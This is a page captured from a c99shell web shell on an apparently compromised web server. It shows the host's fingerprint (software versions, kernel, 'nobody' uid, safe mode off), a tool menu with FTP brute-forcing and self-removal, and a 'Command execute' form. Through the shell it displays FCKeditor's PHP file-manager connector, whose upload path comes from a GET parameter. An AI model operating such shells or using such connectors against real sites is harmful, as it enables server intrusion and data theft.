gaiser.org - c99shell

!C99Shell v. 1.0 pre-release build #13!
Software: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7l DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a uname -a: Linux snow.he.net 4.4.276-v2-mono-1 #1 SMP Wed Jul 21 11:21:17 PDT 2021 i686 uid=99(nobody) gid=98(nobody) groups=98(nobody) Safe-mode: OFF (not secure) /usr/local/webmail2/plugins/html_mail/fckeditor/editor/filemanager/browser/default/connectors/php/ drwxr-xr-x Free 318.4 GB of 458.09 GB (69.51%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php 

/*

 * FCKeditor - The text editor for internet

 * Copyright (C) 2003-2005 Frederico Caldeira Knabben

 * 

 * Licensed under the terms of the GNU Lesser General Public License:

 *         http://www.opensource.org/licenses/lgpl-license.php

 * 

 * For further information visit:

 *         http://www.fckeditor.net/

 * 

 * "Support Open Source software. What about a donation today?"

 * 

 * File Name: connector.php

 *     This is the File Manager Connector for PHP.

 * 

 * File Authors:

 *         Frederico Caldeira Knabben (fredck@fckeditor.net)

 */



include('config.php') ;

include('util.php') ;

include('io.php') ;

include('basexml.php') ;

include('commands.php') ;



if ( !$Config['Enabled'] )

    SendError( 1, 'This connector is disabled. Please check the "editor/filemanager/browser/default/connectors/php/config.php" file' ) ;



// Get the "UserFiles" path.

$GLOBALS["UserFilesPath"] = '' ;



if ( isset( $Config['UserFilesPath'] ) )

    $GLOBALS["UserFilesPath"] = $Config['UserFilesPath'] ;

else if ( isset( $_GET['ServerPath'] ) )

    $GLOBALS["UserFilesPath"] = $_GET['ServerPath'] ;

else

    $GLOBALS["UserFilesPath"] = '/UserFiles/' ;



if ( ! ereg( '/$', $GLOBALS["UserFilesPath"] ) )

    $GLOBALS["UserFilesPath"] .= '/' ;



if ( strlen( $Config['UserFilesAbsolutePath'] ) > 0 ) 

{

    $GLOBALS["UserFilesDirectory"] = $Config['UserFilesAbsolutePath'] ;



    if ( ! ereg( '/$', $GLOBALS["UserFilesDirectory"] ) )

        $GLOBALS["UserFilesDirectory"] .= '/' ;

}

else

{

    // Map the "UserFiles" path to a local directory.

    $GLOBALS["UserFilesDirectory"] = GetRootPath() . $GLOBALS["UserFilesPath"] ;

}



DoResponse() ;



function DoResponse()

{

    if ( !isset( $_GET['Command'] ) || !isset( $_GET['Type'] ) || !isset( $_GET['CurrentFolder'] ) )

        return ;



    // Get the main request informaiton.

    $sCommand        = $_GET['Command'] ;

    $sResourceType    = $_GET['Type'] ;

    $sCurrentFolder    = $_GET['CurrentFolder'] ;



    // Check if it is an allowed type.

    if ( !in_array( $sResourceType, array('File','Image','Flash','Media') ) )

        return ;



    // Check the current folder syntax (must begin and start with a slash).

    if ( ! ereg( '/$', $sCurrentFolder ) ) $sCurrentFolder .= '/' ;

    if ( strpos( $sCurrentFolder, '/' ) !== 0 ) $sCurrentFolder = '/' . $sCurrentFolder ;

    

    // Check for invalid folder paths (..)

    if ( strpos( $sCurrentFolder, '..' ) )

        SendError( 102, "" ) ;



    // File Upload doesn't have to Return XML, so it must be intercepted before anything.

    if ( $sCommand == 'FileUpload' )

    {

        FileUpload( $sResourceType, $sCurrentFolder ) ;

        return ;

    }



    CreateXmlHeader( $sCommand, $sResourceType, $sCurrentFolder ) ;



    // Execute the required command.

    switch ( $sCommand )

    {

        case 'GetFolders' :

            GetFolders( $sResourceType, $sCurrentFolder ) ;

            break ;

        case 'GetFoldersAndFiles' :

            GetFoldersAndFiles( $sResourceType, $sCurrentFolder ) ;

            break ;

        case 'CreateFolder' :

            CreateFolder( $sResourceType, $sCurrentFolder ) ;

            break ;

    }



    CreateXmlFooter() ;



    exit ;

}

?>

:: Command execute ::
Enter:	Select: